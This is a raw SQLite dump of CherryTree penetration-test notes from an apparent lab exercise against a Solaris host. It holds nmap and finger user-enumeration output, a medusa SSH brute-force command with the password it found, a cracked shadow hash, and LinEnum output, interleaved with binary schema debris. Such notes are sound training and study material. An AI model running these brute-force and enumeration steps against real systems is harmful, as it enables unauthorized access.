SQLite format 3@ F-  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node Cn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CX#['  Enumeration$ nmap -sC -sV -Pn 10.10.10.76 Starting Nmap 7.80 (   BBeYS_}kwqMG            " !     vne\SJA8/&                "!     BBeYS_}kwqMG            " !  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node 's\+_tablebookmarkbookmark CREATE TABLE bookmark ( node_id INTEGER UNIQUE, sequence INTEGER )/ Cindexsqlite_autoindex_bookmark_1bookmark /Cindexsqlite_autoindex_children_1childrenr7tablechildrenchildrenCREATE TABLE children ( node_id INTEGER UNIQUE, father_id INTEGER, sequence INTEGER ) tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )  s://nmap.org">https://nmap.org ) at 2020-07-17 09:49 EDT Warning: 10.10.10.76 giving up on port because retransmission cap hit (10). Nmap scan report for 10.10.10.76 Host is up (0.025s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 79/tcp open tcpwrapped |_finger: ERROR: Script execution failed (use -d to debug) 111/tcp open tcpwrapped 1864/tcp filtered paradym-31 5102/tcp filtered admeng 5989/tcp filtered wbem-https 12345/tcp filtered netbus 19315/tcp filtered keyshadow 22022/tcp open ssh SunSSH 1.3 (protocol 2.0) | ssh-hostkey: | 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA) |_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1503.95 seconds custom-colors*AmCw Gy /Gn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CX#['  Enumeration$ nmap -sC -sV -Pn 10.10.10.76 Starting Nmap 7.80 ( custom-colorsAuC #Ji '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Adk '  "CMScustom-colors$A[Y)A[Y}xrich_text> ) ---------------------------------------------------------- | Scan Information | ---------------------------------------------------------- Worker Processes ......... 5 Usernames file ........... /usr/share/seclists/Usernames/Names/names.txt Target count ............. 1 Username count ........... 10164 Target TCP port .......... 79 Query timeout ............ 5 secs Relay Server ............. Not used ######## Scan started at Fri Jul 17 09:38:28 2020 ######### access@10.10.10.76: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >.. admin@10.10.10.76: Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line Printer Admin < . . . . >..uucp uucp Admin < . . . . >..nuucp uucp Admin < . . . . >..dladm Datalink Admin < . . . . >..listen Network Admin < . . . . >.. anne marie@10.10.10.76: Login Name TTY Idle When Where..anne ???..marie ???.. bin@10.10.10.76: bin ??? < . . . . >.. dee dee@10.10.10.76: Login Name TTY Idle When Where..dee ???..dee ???.. jo ann@10.10.10.76: Login Name TTY Idle When Where..jo ???..ann ???.. la verne@10.10.10.76: Login Name TTY Idle When Where..la ???..verne ???.. line@10.10.10.76: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >.. message@10.10.10.76: Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >.. miof mela@10.10.10.76: Login Name TTY Idle When Where..miof ???..mela ???.. root@10.10.10.76: root Super-User pts/3 <Apr 24, 2018> sunday .. sammy@10.10.10.76: sammy pts/2 <Apr 24, 2018> 10.10.14.4 .. sys@10.10.10.76: sys ??? < . . . . >.. zsa zsa@10.10.10.76: Login Name TTY Idle When Where..zsa ???..zsa ???.. ######## Scan completed at Fri Jul 17 10:05:22 2020 ######### 14 results. 10164 queries in 1614 seconds (6.3 queries / sec) daemon gdm mysql nobody nobody4 postgres svctag webservd zfssnap sunny sammycustom-colorsA[EϯAl` hhq/'  Post Exploitationcustom-colors*AIZnn"%m'  ExploitationService Exploited: SSH Vulnerability Type: NO ACCOUNT LOCKOUT POLICY Exploit POC: Description: Finger is running on Port 79 http://pentestmonkey.net/tools/user-enumeration/finger-user-enum has user enumeration script Found Users: Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum<line="single" weight="heavy">Discovery of Vulnerability Exploit Code Used $ medusa -u sunny -P /usr/share/wordlists/rockyou.txt -M ssh -h 10.10.10.76 -n 22022 Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net> ACCOUNT CHECK: [ssh] Host: 10.10.10.76 (1 of 1, 0 complete) User: sunny (1 of 1, 0 complete) Password: sunday (1 of 1 complete) ACCOUNT FOUND: [ssh] Host: 10.10.10.76 User: sunny Password: sunday [SUCCESS] Later found backup of the shadow file. sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445:::::: CRACKED HASH TO cooldude! Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,ApZٙ################################[00m [00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m [00;31m#########################################################[00m [00;33m# www.rebootuser.com[00m [00;33m# version 0.982[00m [-] Debug Info [+] Thorough tests = Enabled [00;33mScan started at: Fri Jul 17 15:12:42 IST 2020 [00m [00;33m### SYSTEM ##############################################[00m [00;31m[-] Kernel information:[00m SunOS sunday 5.11 snv_111b i86pc i386 i86pc Solaris [00;31m[-] Hostname:[00m sunday [00;33m### USER/GROUP ##########################################[00m [00;31m[-] Current user/group info:[00m uid=65535(sunny) gid=1(other) groups=1(other) [00;31m[-] Who else is logged on:[00m 3:12pm up 1:46, 1 user, load average: 0.00, 0.00, 0.00 User tty login@ idle JCPU PCPU what sunny pts/2 3:07pm w [00;31m[-] Group memberships:[00m uid=0(root) gid=0(root) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(lp),9(nuucp),12(daemon) uid=1(daemon) gid=1(other) groups=1(other),2(bin),4(adm) uid=2(bin) gid=2(bin) groups=2(bin),3(sys) uid=3(sys) gid=3(sys) groups=3(sys) uid=4(adm) gid=4(adm) groups=4(adm),3(sys),7(tty),8(lp) uid=71(lp) gid=8(lp) groups=8(lp) uid=5(uucp) gid=5(uucp) groups=5(uucp) uid=9(nuucp) gid=9(nuucp) groups=9(nuucp) uid=15(dladm) gid=3(sys) groups=3(sys) uid=25(smmsp) gid=25(smmsp) groups=25(smmsp) uid=37(listen) gid=4(adm) groups=4(adm) uid=50(gdm) gid=50(gdm) groups=50(gdm) uid=51(zfssnap) gid=12(daemon) groups=12(daemon) uid=60(xvm) gid=60(xvm) groups=60(xvm) uid=70(mysql) gid=70(mysql) groups=70(mysql) uid=75(openldap) gid=75(openldap) groups=75(openldap) uid=80(webservd) gid=80(webservd) groups=80(webservd) uid=90(postgres) gid=90(postgres) groups=90(postgres) uid=95(svctag) gid=12(daemon) groups=12(daemon) uid=60001(nobody) gid=60001(nobody) groups=60001(nobody) uid=60002(noaccess) gid=60002(noaccess) groups=60002(noaccess) uid=65534(nobody4) gid=65534(nogroup) groups=65534(nogroup) uid=101(sammy) gid=10(staff) groups=10(staff) uid=65535(sunny) gid=1(other) groups=1(other) [00;31m[-] It looks like we have some admin users:[00m uid=0(root) gid=0(root) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(lp),9(nuucp),12(daemon) uid=1(daemon) gid=1(other) groups=1(other),2(bin),4(adm) uid=4(adm) gid=4(adm) groups=4(adm),3(sys),7(tty),8(lp) uid=37(listen) gid=4(adm) groups=4(adm) [00;31m[-] Contents of /etc/passwd:[00m root:x:0:0:Super-User:/root:/usr/bin/bash daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico dladm:x:15:3:Datalink Admin:/: smmsp:x:25:25:SendMail Message Submission Program:/: listen:x:37:4:Network Admin:/usr/net/nls: gdm:x:50:50:GDM Reserved UID:/: zfssnap:x:51:12:ZFS Automatic Snapshots Reserved UID:/:/usr/bin/pfsh xvm:x:60:60:xVM User:/: mysql:x:70:70:MySQL Reserved UID:/: openldap:x:75:75:OpenLDAP User:/: webservd:x:80:80:WebServer Reserved UID:/: postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh svctag:x:95:12:Service Tag UID:/: nobody:x:60001:60001:NFS Anonymous Access User:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/: sammy:x:101:10:sammy:/export/home/sammy:/bin/bash sunny:x:65535:1:sunny:/export/home/sunny:/bin/bash [00;31m[-] Super user account(s):[00m root [00;33m[+] We can sudo without supplying a password![00m usage: sudo -h | -K | -k | -L | -l | -V | -v usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value] {-i | -s | <command>} usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ... [00;33m[+] Possible sudo pwnage![00m file [00;31m[-] Are permissions on /home directories lax:[00m total 2.0K dr-xr-xr-x 1 root root 1 2020-07-17 13:26 . drwxr-xr-x 26 root root 27 2018-04-24 12:57 .. [00;31m[-] Files owned by our user:[00m -rw------- 1 sunny other 255 2018-04-15 20:29 /export/home/sunny/.nautilus/metafiles/x-nautilus-desktop:%2F%2F%2F.xml -rw------- 1 sunny other 466 2018-04-15 20:29 /export/home/sunny/.nautilus/metafiles/file:%2F%2F%2Fexport%2Fhome%2Fsunny%2FDesktop.xml -rw-r--r-- 1 sunny other 280 2018-04-15 20:18 /export/home/sunny/.bashrc -rw-r--r-- 1 sunny other 988 2018-04-15 20:18 /export/home/sunny/local.login -rw------- 1 sunny other 167 2018-04-15 20:29 /export/home/sunny/.ICEauthority -rw-r--r-- 1 sunny other 8 2018-04-15 20:29 /export/home/sunny/.chewing/uhash.dat -rw-r--r-- 1 sunny other 13 2018-04-15 20:31 /export/home/sunny/.updatemanager/notify/opensolaris-lastcheck -rw-r--r-- 1 sunny other 0 2018-04-15 20:29 /export/home/sunny/.local/share/codeina/mozembed/.parentlock -rw-r--r-- 1 sunny other 458 2018-04-15 20:29 /export/home/sunny/.dbus/session-bus/98a1bc55dc30eb272f68a0145ad3ab13-0 -rw-r--r-- 1 sunny other 3094 2018-04-15 20:52 /export/home/sunny/.xsession-errors -rwx------ 1 sunny other 98355 2018-04-15 20:52 /export/home/sunny/.gconfd/saved_state -rw-r--r-- 1 sunny other 1002 2018-04-15 20:18 /export/home/sunny/local.profile -rw-r--r-- 1 sunny other 3009 2018-04-15 20:29 /export/home/sunny/Desktop/addmoresoftware.desktop -rw-r--r-- 1 sunny other 2070 2018-04-15 20:29 /export/home/sunny/Desktop/register-opensolaris.desktop -rw-r--r-- 1 sunny other 2176 2018-04-15 20:29 /export/home/sunny/Desktop/opensolaris-next-steps.desktop -rw-r--r-- 1 sunny other 0 2018-04-15 20:29 /export/home/sunny/Desktop/.os-icons-installed -rw-r--r-- 1 sunny other 611 2018-04-15 20:18 /export/home/sunny/.profile -rw-r--r-- 1 sunny other 2 2018-04-15 20:29 /export/home/sunny/.gnome2/share/cursor-fonts/fonts.dir -rw-r--r-- 1 sunny other 2 2018-04-15 20:29 /export/home/sunny/.gnome2/share/fonts/fonts.dir -rw-r----- 1 sunny other 0 2018-04-15 20:51 /export/home/sunny/.gksu.lock -rw------- 1 sunny other 5288 2018-04-15 20:30 /export/home/sunny/.gconf/desktop/input_methods/%gconf.xml -rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/desktop/%gconf.xml -rw------- 1 sunny other 441 2018-04-15 20:30 /export/home/sunny/.gconf/desktop/gnome/input_methods/%gconf.xml -rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/desktop/gnome/%gconf.xml -rw------- 1 sunny other 1923 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/trash_screen0/%gconf.xml -rw------- 1 sunny other 1929 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/workspace_switcher_screen0/%gconf.xml -rw------- 1 sunny other 445 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/workspace_switcher_screen0/prefs/%gconf.xml -rw------- 1 sunny other 1914 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/mixer_screen0/%gconf.xml -rw------- 1 sunny other 0 2018-04-15 20:52 /export/home/sunny/.gconf/apps/panel/applets/%gconf.xml -rw------- 1 sunny other 1914 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/clock_screen0/%gconf.xml -rw------- 1 sunny other 2382 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/clock_screen0/prefs/%gconf.xml -rw------- 1 sunny other 1924 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/show_desktop_button_screen0/%gconf.xml -rw------- 1 sunny other 1925 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/notification_area_screen0/%gconf.xml -rw------- 1 sunny other 1923 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/window_list_screen0/%gconf.xml -rw------- 1 sunny other 670 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/applets/window_list_screen0/prefs/%gconf.xml -rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/%gconf.xml -rw------- 1 sunny other 1812 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/objects/menu_bar_screen0/%gconf.xml -rw------- 1 sunny other 1908 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/objects/browser_launcher_screen0/%gconf.xml -rw------- 1 sunny other 1915 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/objects/terminal_launcher_screen0/%gconf.xml -rw------- 1 sunny other 1914 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/objects/home_launcher_screen0/%gconf.xml -rw------- 1 sunny other 1912 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/objects/email_launcher_screen0/%gconf.xml -rw------- 1 sunny other 1915 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/objects/ips_launcher_screen0/%gconf.xml -rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/objects/%gconf.xml -rw------- 1 sunny other 2292 2018-04-15 20:52 /export/home/sunny/.gconf/apps/panel/general/%gconf.xml -rw------- 1 sunny other 2196 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/toplevels/bottom_panel_screen0/%gconf.xml -rw------- 1 sunny other 1107 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/toplevels/bottom_panel_screen0/background/%gconf.xml -rw------- 1 sunny other 2156 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/toplevels/top_panel_screen0/%gconf.xml -rw------- 1 sunny other 1104 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/toplevels/top_panel_screen0/background/%gconf.xml -rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/apps/panel/toplevels/%gconf.xml -rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/apps/gnome-power-manager/%gconf.xml -rw------- 1 sunny other 174 2018-04-15 20:30 /export/home/sunny/.gconf/apps/gnome-power-manager/cpufreq/%gconf.xml -rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/apps/%gconf.xml -rw------- 1 sunny other 0 2018-04-15 20:32 /export/home/sunny/.gconf/apps/updatemanager/%gconf.xml -rw------- 1 sunny other 145 2018-04-15 20:32 /export/home/sunny/.gconf/apps/updatemanager/preferences/%gconf.xml -rw------- 1 sunny other 245 2018-04-15 20:30 /export/home/sunny/.gconf/apps/gimlet/preference/%gconf.xml -rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/apps/gimlet/%gconf.xml -rw------- 1 sunny other 143 2018-04-15 20:30 /export/home/sunny/.gconf/apps/gnome-screensaver/%gconf.xml -rw------- 1 sunny other 177 2018-04-15 20:30 /export/home/sunny/.gconf/apps/nwam-manager/%gconf.xml -rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/apps/gnome-terminal/profiles/%gconf.xml -rw------- 1 sunny other 576 2018-04-15 20:52 /export/home/sunny/.gconf/apps/gnome-terminal/profiles/Default/%gconf.xml -rw------- 1 sunny other 0 2018-04-15 20:30 /export/home/sunny/.gconf/apps/gnome-terminal/%gconf.xml -rw-r--r-- 1 sunny other 1039 2018-04-15 20:18 /export/home/sunny/local.cshrc -rw------- 1 sunny other 26 2018-04-15 20:29 /export/home/sunny/.dmrc -rw-r--r-- 1 sunny other 37 2018-04-15 20:29 /export/home/sunny/.printer-groups.xml -rw-r--r-- 1 sunny other 5 2018-04-15 20:29 /export/home/sunny/.config/user-dirs.locale -rw------- 1 sunny other 672 2018-04-15 20:29 /export/home/sunny/.config/user-dirs.dirs -rw-r--r-- 1 sunny other 202 2018-04-15 20:29 /export/home/sunny/.gtk-bookmarks -rw------- 1! sunny other 192473 2018-04-15 20:29 /export/home/sunny/.gstreamer-0.10/registry.i386.bin -rwxr-xr-x 1 sunny other 46631 2020-07-17 20:36 /tmp/LinEnum.sh -rw-r--r-- 1 sunny other 4095 2020-07-17 15:12 /tmp/output.txt [00;31m[-] Hidden files:[00m --wsr--r-x 1 root root 0 2018-04-16 01:12 /media/.hal-mtab-lock -rw-r--r-- 1 root root 0 2020-07-17 13:26 /media/.hal-mtab -rw-r--r-- 1 sammy staff 202 2018-04-16 15:27 /export/home/sammy/.gtk-bookmarks -rw-r--r-- 1 sammy staff 2991 2018-04-16 15:33 /export/home/sammy/.xsession-errors -rw-r--r-- 1 sammy staff 611 2018-04-15 19:52 /export/home/sammy/.profile -rw------- 1 sammy staff 26 2018-04-24 11:22 /export/home/sammy/.dmrc -rw-r--r-- 1 sammy staff 0 2018-04-15 20:15 /export/home/sammy/Desktop/.os-icons-installed -rw-r--r-- 1 sammy staff 37 2018-04-15 20:15 /export/home/sammy/.printer-groups.xml -rw------- 1 root root 0 2018-04-24 11:28 /export/home/sammy/.bash_history -rw-r--r-- 1 sammy staff 280 2018-04-15 19:52 /export/home/sammy/.bashrc -rw------- 1 sammy "staff 336 2018-04-16 15:27 /export/home/sammy/.ICEauthority -rw-r--r-- 1 sunny other 280 2018-04-15 20:18 /export/home/sunny/.bashrc -rw------- 1 sunny other 167 2018-04-15 20:29 /export/home/sunny/.ICEauthority -rw-r--r-- 1 sunny other 0 2018-04-15 20:29 /export/home/sunny/.local/share/codeina/mozembed/.parentlock -rw------- 1 root root 0 2018-04-24 09:10 /export/home/sunny/.bash_history -rw-r--r-- 1 sunny other 3094 2018-04-15 20:52 /export/home/sunny/.xsession-errors -rw-r--r-- 1 sunny other 0 2018-04-15 20:29 /export/home/sunny/Desktop/.os-icons-installed -rw-r--r-- 1 sunny other 611 2018-04-15 20:18 /export/home/sunny/.profile -rw-r----- 1 sunny other 0 2018-04-15 20:51 /export/home/sunny/.gksu.lock -rw------- 1 sunny other 26 2018-04-15 20:29 /export/home/sunny/.dmrc -rw-r--r-- 1 sunny other 37 2018-04-15 20:29 /export/home/sunny/.printer-groups.xml -rw-r--r-- 1 sunny other 202 2018-04-15 20:29 /export/home/sunny/.gtk-bookmarks -rw-r--r-- 1 root root 0 2018-04-16 01:12 /var/sadm/install/.pkg.lock -r#--r--r-- 1 root root 11 2020-07-17 13:26 /tmp/.X0-lock -rw-r--r-- 1 root root 309 2018-04-15 19:52 /etc/.sysIDtool.state -rw-r--r-- 1 root sys 1429 2009-05-14 21:18 /etc/.login -rw-r--r-- 1 root root 26 2018-04-15 20:28 /etc/sma/snmp/mibs/.index -rw-r--r-- 1 root root 156 2018-04-15 19:52 /etc/.sysidconfig.apps -rw-r--r-- 1 root root 4 2018-04-24 09:24 /etc/dev/.devfsadm_dev.lock -rw-r--r-- 1 root root 0 2018-04-16 01:12 /etc/dev/.devfsadm_daemon.lock -rw-r--r-- 1 root root 106496 2020-07-17 15:12 /etc/dev/.devlink_db -rw-r--r-- 1 root root 0 2009-05-14 21:23 /etc/dev/.devlink_db_lock -rwxr--r-- 1 root sys 982 2009-05-14 21:18 /etc/cron.d/.proto -rw------- 1 root root 0 2018-04-15 20:18 /etc/.pwd.lock -rw-r--r-- 1 root other 280 2009-05-14 21:18 /etc/skel/.bashrc -rw-r--r-- 1 root other 611 2009-05-14 21:18 /etc/skel/.profile -rw-r--r-- 1 root root 2236 2020-07-17 13:26 /etc/.cpr_config -r--r--r-- 1 root bin 74916 2009-05-14 21:21 /usr/perl5/5.8.4/lib/i86pc-solaris-64int/.packlist -rwxr-xr-x 1 root bin 45$4 2009-05-14 21:22 /usr/perl5/vendor_perl/5.8.4/i86pc-solaris-64int/auto/Pidgin/.packlist -rwxr-xr-x 1 root bin 585 2009-05-14 21:22 /usr/perl5/vendor_perl/5.8.4/i86pc-solaris-64int/auto/Purple/.packlist -rw-r--r-- 1 root bin 684 2009-05-14 21:21 /usr/perl5/vendor_perl/5.8.4/i86pc-solaris-64int/auto/Authen/PAM/.packlist -rw-r--r-- 1 root bin 4712 2009-05-14 21:21 /usr/perl5/vendor_perl/5.8.4/i86pc-solaris-64int/auto/XML/Parser/.packlist -rw-r--r-- 1 root bin 388 2009-05-14 21:21 /usr/perl5/vendor_perl/5.8.4/i86pc-solaris-64int/auto/XML/Simple/.packlist -rw-r--r-- 1 root bin 29 2009-05-14 21:21 /usr/lib/firefox/.autoreg [00;31m[-] Home directory contents:[00m total 45K drwxr-xr-x 18 sunny other 30 2018-04-15 20:52 . drwxr-xr-x 4 root root 4 2018-04-15 20:18 .. -rw------- 1 root root 0 2018-04-24 09:10 .bash_history -rw-r--r-- 1 sunny other 280 2018-04-15 20:18 .bashrc drwx------ 2 sunny other 3 2018-04-15 20:29 .chewing drwxr-xr-x 2 sunny other 4 2018-04-15 20:29 .config drwx-----%- 3 sunny other 3 2018-04-15 20:29 .dbus drwxr-xr-x 2 sunny other 6 2018-04-15 20:29 Desktop -rw------- 1 sunny other 26 2018-04-15 20:29 .dmrc drwxr-xr-x 6 sunny other 6 2018-04-15 20:29 Documents drwxr-xr-x 2 sunny other 2 2018-04-15 20:29 Downloads drwx------ 4 sunny other 4 2018-04-15 20:30 .gconf drwx------ 2 sunny other 3 2018-04-15 20:52 .gconfd -rw-r----- 1 sunny other 0 2018-04-15 20:51 .gksu.lock drwx------ 7 sunny other 7 2018-04-15 20:29 .gnome2 drwx------ 2 sunny other 2 2018-04-15 20:29 .gnome2_private drwxr-xr-x 2 sunny other 3 2018-04-15 20:29 .gstreamer-0.10 -rw-r--r-- 1 sunny other 202 2018-04-15 20:29 .gtk-bookmarks -rw------- 1 sunny other 167 2018-04-15 20:29 .ICEauthority drwx------ 3 sunny other 3 2018-04-15 20:29 .iiim drwx------ 3 sunny other 3 2018-04-15 20:29 .local -rw-r--r-- 1 sunny other 1.1K 2018-04-15 20:18 local.cshrc -rw-r--r-- 1 sunny other 988 2018-04-15 20:18 local.login -rw-r--r-- 1 sunny other 1002 2018-04-15& 20:18 local.profile drwxr-xr-x 3 sunny other 3 2018-04-15 20:29 .nautilus -rw-r--r-- 1 sunny other 37 2018-04-15 20:29 .printer-groups.xml -rw-r--r-- 1 sunny other 611 2018-04-15 20:18 .profile drwxr-xr-x 2 sunny other 2 2018-04-15 20:29 Public drwxr-xr-x 3 sunny other 3 2018-04-15 20:31 .updatemanager -rw-r--r-- 1 sunny other 3.1K 2018-04-15 20:52 .xsession-errors [00;33m### ENVIRONMENTAL #######################################[00m [00;31m[-] Environment information:[00m MANPATH=/usr/gnu/share/man:/usr/share/man:/usr/X11/share/man SHELL=/bin/bash TERM=xterm-256color SSH_CLIENT=10.10.14.10 42578 22022 SSH_TTY=/dev/pts/2 USER=sunny PAGER=/usr/bin/less -ins PATH=/usr/gnu/bin:/usr/bin:/usr/X11/bin:/usr/sbin:/sbin MAIL=/var/mail/sunny PWD=/tmp LANG=en_US.UTF-8 TZ=Asia/Kolkata HOME=/export/home/sunny SHLVL=2 LOGNAME=sunny SSH_CONNECTION=10.10.14.10 42578 10.10.10.76 22022 _=/usr/gnu/bin/env [00;31m[-] Path information:[00m /usr/gnu/bin:/usr/bin:/usr/X11/bin:/usr/sbin:/sbin drwxr-xr-x 2 r'oot sys 58 2018-04-15 19:53 /sbin drwxr-xr-x 5 root bin 1187 2018-04-15 19:52 /usr/bin drwxr-xr-x 2 root bin 90 2018-04-15 19:51 /usr/gnu/bin drwxr-xr-x 4 root bin 394 2018-04-15 19:53 /usr/sbin drwxr-xr-x 4 root bin 126 2018-04-15 19:51 /usr/X11/bin [00;31m[-] Current umask value:[00m u=rwx,g=rx,o=rx 0022 [00;33m### JOBS/TASKS ##########################################[00m [00;31m[-] Cron jobs:[00m lrwxrwxrwx 1 root root 16 2018-04-15 19:52 /etc/cron -> ../usr/sbin/cron /etc/cron.d: total 14 drwxr-xr-x 2 root sys 7 2020-07-17 13:26 . drwxr-xr-x 77 root sys 224 2020-07-17 15:12 .. -rw-r--r-- 1 root sys 17 2009-05-14 21:18 at.deny -rw-r--r-- 1 root sys 17 2009-05-14 21:18 cron.deny prw------- 1 root root 0 2020-07-17 13:26 FIFO -rwxr--r-- 1 root sys 982 2009-05-14 21:18 .proto -rw-r--r-- 1 root sys 17 2009-05-14 21:18 queuedefs [00;31m[-] Anything interesting in /var/spool/cron/crontabs:[00m total 11 drwxr-xr-x 2 root sys 6 2020-07-17 13:26 . drwxr-xr-x 4 root sys ( 4 2009-05-14 21:18 .. -rw------- 1 root sys 1004 2009-05-14 21:18 adm -r-------- 1 root root 1365 2009-05-14 21:21 lp -rw------- 1 root root 1069 2020-07-17 13:26 root -rw------- 1 root sys 1122 2009-05-14 21:22 sys [00;33m### NETWORKING ##########################################[00m [00;31m[-] Network and IP info:[00m lo0: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 index 1 inet 127.0.0.1 netmask ff000000 pcn0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2 inet 10.10.10.76 netmask ffffff00 broadcast 10.10.10.255 lo0: flags=2002000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv6,VIRTUAL> mtu 8252 index 1 inet6 ::1/128 [00;31m[-] ARP history:[00m Net to Media Table: IPv4 Device IP Address Mask Flags Phys Addr ------ -------------------- --------------- -------- --------------- pcn0 10.10.10.2 255.255.255.255 o 00:50:56:b9:f9:ab pcn0 sunday 255.255.255.255 SPLA 00:50:56:b9:d7):03 pcn0 224.0.0.0 240.0.0.0 SM 01:00:5e:00:00:00 [00;31m[-] Nameserver(s):[00m nameserver 10.10.10.2 [00;33m### SERVICES #############################################[00m [00;31m[-] Running processes:[00m USER PID %CPU %MEM SZ RSS TT S START TIME COMMAND gdm 528 0.1 2.926668859320 ? S 13:26:50 0:03 /usr/lib/gdmgreete sunny 26263 0.1 0.1 4752 1528 pts/2 O 15:14:30 0:00 ps aux root 483 0.1 1.03962020008 ? S 13:26:46 0:03 /usr/X11/bin/Xorg root 3 0.1 0.0 0 0 ? S 13:26:23 0:01 fsflush sunny 25881 0.1 0.1 